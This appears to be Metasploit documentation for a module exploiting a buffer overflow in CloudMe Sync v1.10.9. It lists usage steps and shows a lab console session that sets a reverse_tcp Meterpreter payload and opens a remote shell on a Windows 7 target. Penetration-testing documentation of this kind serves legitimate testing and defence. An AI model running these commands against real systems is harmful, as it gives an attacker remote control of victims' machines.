Files
metasploit-gs/documentation/modules/exploit/windows/misc/cloudme_sync.md
T
2018-02-22 08:27:35 -08:00

1.4 KiB

Description

This module exploits a buffer overflow vulnerability in CloudMe Sync v1.10.9.

Verification Steps

  1. Install CloudMe for Desktop version v1.10.9
  2. Start the applicaton (you don't need to create an account)
  3. Start msfconsole
  4. Do use exploit/windows/misc/cloudme_sync
  5. Do set RHOST ip
  6. Do set LHOST ip
  7. Do exploit
  8. Verify the Meterpreter session is opened

Scenarios

CloudMe Sync client application on Windows 7 SP1 x86

msf > use exploit/windows/misc/cloudme_sync 
msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148
RHOST => 172.16.40.148
msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5 
LHOST => 172.16.40.5
msf exploit(windows/misc/cloudme_sync) > exploit 

[*] Started reverse TCP handler on 172.16.40.5:4444 
[*] Sending stage (179779 bytes) to 172.16.40.148
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000

meterpreter > sysinfo 
Computer        : PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : pt_PT
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >